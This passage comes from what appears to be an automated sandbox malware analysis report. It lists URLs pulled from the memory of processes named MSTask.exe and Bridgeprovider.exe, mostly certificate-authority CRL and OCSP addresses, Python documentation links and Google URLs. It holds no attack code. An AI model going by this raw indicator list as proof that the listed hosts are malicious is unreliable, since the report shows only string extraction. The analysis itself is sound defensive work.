00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                  Source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micB
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                  Source: MSTask.exe, 0000003E.00000002.4151888834.00000268D2090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                  Source: MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl.
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                  Source: MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://greenbytes.de/tech/tc2231/
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1C7D000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                  Source: MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ocsp.thawte.com0
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pypi.python.org/pypi/wget/
                                  Source: Bridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 